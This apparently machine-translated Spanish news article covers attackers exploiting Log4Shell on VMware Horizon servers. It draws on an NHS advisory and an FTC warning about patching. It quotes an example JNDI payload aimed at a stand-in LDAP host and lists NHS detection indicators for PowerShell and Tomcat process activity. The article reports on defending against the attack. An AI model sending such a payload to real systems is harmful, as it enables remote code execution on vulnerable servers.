Noticias Tecnológicas

Los sistemas de parches son propensos a errores críticos de Log4j, advierten funcionarios británicos y estadounidenses

imágenes falsas

El sistema de salud del Reino Unido, financiado con fondos públicos, advierte que los delincuentes están explotando activamente la vulnerabilidad Log4Shell de alto nivel en los servidores que ejecutan VMware Horizon para instalar malware que les permita obtener un control total sobre los sistemas afectados.

CVE-2021-44228 es una de las vulnerabilidades más graves que han salido a la luz en los últimos años. Reside en Log4J, una biblioteca de código de registro del sistema que se utiliza en miles, si no millones, de aplicaciones y sitios web de terceros. Esto significa que hay una gran base de sistemas vulnerables. Además, la vulnerabilidad es extremadamente fácil de explotar y permite a los atacantes instalar shells web que proporcionan una ventana de comandos para ejecutar comandos con privilegios elevados en servidores pirateados.

El error de ejecución remota de código en Log4J se descubrió en diciembre después de que se lanzara el código de explotación antes de que estuviera disponible un parche. Los piratas informáticos maliciosos rápidamente comenzaron a explotar activamente CVE-2021-44228 para comprometer sistemas confidenciales.

Los ataques, incluso en VMware Horizon, han continuado desde entonces.

“Se observó un grupo de amenazas desconocido dirigido a servidores VMware Horizon que ejecutan versiones afectadas por Vulnerabilidades de Log4Shell para establecer persistencia en las redes afectadas”, dijeron funcionarios del Sistema Nacional de Salud del Reino Unido escribió. Continuaron brindando orientación sobre los pasos específicos que las organizaciones afectadas pueden tomar para mitigar la amenaza.

Lo primero y más importante es la recomendación de instalar una actualización que VMware lanzado por su producto Horizon, que permite a las empresas virtualizar funciones de escritorio y aplicaciones con la tecnología de virtualización de la empresa. Los funcionarios del NHS también notaron señales que las organizaciones en riesgo pueden buscar para identificar posibles ataques que puedan haber sufrido.

El consejo llega un día después de que la Comisión Federal de Comercio prevenido empresas centradas en el consumidor para parchear los sistemas vulnerables para evitar el destino de Equifax. En 2019, la oficina de crédito acordó pagar $ 575 millones para pagar las tarifas de la FTC debido a la falla en parchear una vulnerabilidad igualmente grave en otro software llamado Apache Struts. Cuando un atacante desconocido aprovechó una vulnerabilidad en la red de Equifax, comprometió los datos confidenciales de 143 millones de personas, lo que la convirtió en una de las peores filtraciones de datos de todos los tiempos.

«La FTC tiene la intención de utilizar todos sus poderes legales para enjuiciar a las empresas que no toman medidas razonables en el futuro para proteger los datos de los consumidores de la divulgación a través de Log4j o vulnerabilidades conocidas similares», dijeron los funcionarios de la FTC. dicho

El NHS es al menos la segunda organización en observar exploits dirigidos a un producto de VMware. El mes pasado, investigador reportado que los atacantes atacaron los sistemas con VMware VCenter para instalar el ransomware Conti.

Los ataques a servidores VMware Horizon sin parches tienen como objetivo el uso de un servicio de código abierto.

«Es muy probable que el ataque se inicie a través de una carga útil de Log4Shell similar a $ {jndi: ldap: //example.com}», dijo el aviso del NHS. “El ataque utiliza la vulnerabilidad Log4Shell en el servicio Apache Tomcat, que está integrado en VMware Horizon. Esto luego inicia el siguiente comando de PowerShell, que es generado por ws_TomcatService.exe: «

Servicio Nacional de Salud

Después de algunos pasos adicionales, los atacantes pueden instalar un shell web que se comunica permanentemente con un servidor que controlan. Aquí hay una representación del ataque:

Servicio Nacional de Salud

La nota agregó:

Las organizaciones deben prestar atención a lo siguiente:

  • Pruebas para ws_TomcatService.exe producir procesos anormales
  • Ningún powershell.exe Procesos que contienen ‘VMBlastSG’ en la línea de comando
  • El archivo cambia a ‘… VMware VMware View Server appblastgateway lib absg-worker.js’: este archivo generalmente se sobrescribe y no cambia durante las actualizaciones

Compañía de seguridad pretoriana despedida el viernes esta herramienta para identificar sistemas vulnerables a gran escala.

Publicaciones relacionadas

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Botón volver arriba